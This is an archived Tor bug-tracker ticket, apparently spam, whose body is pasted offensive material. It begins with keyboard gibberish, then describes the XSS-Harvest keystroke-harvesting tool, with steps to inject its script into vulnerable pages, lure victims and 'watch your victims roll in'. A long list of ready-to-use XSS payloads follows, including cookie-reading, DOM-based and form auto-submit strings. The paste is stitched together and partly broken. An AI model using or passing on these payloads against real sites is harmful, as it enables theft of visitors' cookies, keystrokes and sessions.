[Author Prev][Author Next][Thread Prev][Thread Next][Author Index][Thread Index]
[tor-bugs] #23014 [- Select a component]: manish
#23014: manish
--------------------------------------+--------------------------------
Reporter: manishhacks8 | Owner:
Type: enhancement | Status: new
Priority: Medium | Milestone: Tor: 0.3.1.x-final
Component: - Select a component | Version:
Severity: Normal | Keywords:
Actual Points: | Parent ID:
Points: | Reviewer:
Sponsor: |
--------------------------------------+--------------------------------
jhflkdsfnasfa d* Server console displays real-time data received (due to
multi-threaded nature, keystrokes are displayed as ‘.’ characters to avoid
confusion).
* Tested in IE6-9 (reflected XSS protection in IE9 will limit exploitation
to stored XSS only in most cases), FF5, Chrome and various mobile browsers
(Safari and Android). Please let me know your success with other browsers.
* Overcomes browser oddities, such as Internet Explorer throttling
requests to the same URL when exfiltrating keystrokes.
How to Exploit XSS with XSS-Harvest?
Identify a page vulnerable to XSS (reflected or persistent will be fine –
unless the victim is running IE9 or another plugin such as NoScript).
Understand the markup of the page. You should be looking to insert
syntactically correct <script></script> tags in to the source of the
vulnerable page. Most attackers will insert something like
‘<script>alert(1)</script>’ at this stage to ensure the page is actually
vulnerable.
Start the XSS-Harvest server as root if you wish to bind to a TCP port <
1024 (default port is 80), or as a limited user on a port > 1024 using the
-p option. To start the server you must instruct it to listen with the -l
option.
Insert the following ‘injection string’ into the vulnerable page:
<script src=”>
This will return the client-side JavaScript to the victim, indicated by
the ‘i’ in the URL.
Entice visitors to the infected page (or to follow a link in the case of
reflected XSS).
Watch your victims roll in – a new history file will be created for each
new victim.
To use of the redress function, start the server with the -r parameter:
./xss-harvest.pl -l -r http://vulnerablepage.local/login.html
Basic dependencies:
HTTP::Server::Simple::CGI, Digest::MD5, Time::Local, Getopt::Std,
Net::Server::PreFork
Download XSS-Harvest
–> New:- Advance Scripts To Find XSS Vulnerabilities In Websites.
Just Copy any script and try..
To Redirect exploit code:
';redirecturl='javascript:alert("XSS")
';redirecturl='http://google.com/'
Now for XSS
Example: www.xyz.com?q="XSS Script"
"/>alert("Xss:Priyanshu")
"/></script><script>alert(/XSS : Priyanshu/)</script>
<body onload=alert(1)>
"<body onload="alert('XSS by Priyanshu')">
"><%2Fstyle<%2Fscript><script>confirm("XSS By Priyanshu")<%2Fscript>
<body onload=document.getElementById("xsrf").submit()>
<a
href="data:text/html;based64_,<svg/onload=\u0061l&101%72t(1)>">X</a
<a
href="data:text/html;based64_,<svg/onload=\u0061l&101%72t(document.cookie)>">X</a
http://test.com<script>alert(document.domain)</script>
http://test.com<script>alert(document.cookie)</script>
<img src=x onerror=alert(document.domain)>
x"></script><img src=x onerror=alert(1)>
q=" onclick="alert(/XSS/)
"><iframe src='javascript:prompt(/XSS/);'>
<iframe src="http://google.com"></iframe>
"><iframe src=a onload=alert('XSS')<
</script><script>alert(document.cookie)</script>
<xss>alert('xss')</xss>
<iframe src="http://google.com"></iframe>
DOM Based XSS Scripts
/default.aspx#"><img src=x onerror=prompt('XSS');>
/default.aspx#"><img src=x onerror=prompt('0');>
<img src=x onerror=prompt(1);> by ">
“><img src=x onerror=prompt(0)>.txt.jpg
“><img src=x onerror=alert(document.cookie)>
"><img src=x onerror=prompt(1);>
"><script>alert('XSS')</script>
id=abc"><Script>alert(/xss/)</SCRIPT>
"><img src=" " onMouseover=prompt(/xss/);>
Default.aspx/" onmouseout="confirm(1)'x="
For More Script Coding Of XSS Visit ha.ckers.org and Brute.
--
Ticket URL: <https://trac.torproject.org/projects/tor/ticket/23014>
Tor Bug Tracker & Wiki <https://trac.torproject.org/>
The Tor Project: anonymity online
_______________________________________________
tor-bugs mailing list
tor-bugs@xxxxxxxxxxxxxxxxxxxx
https://lists.torproject.org/cgi-bin/mailman/listinfo/tor-bugs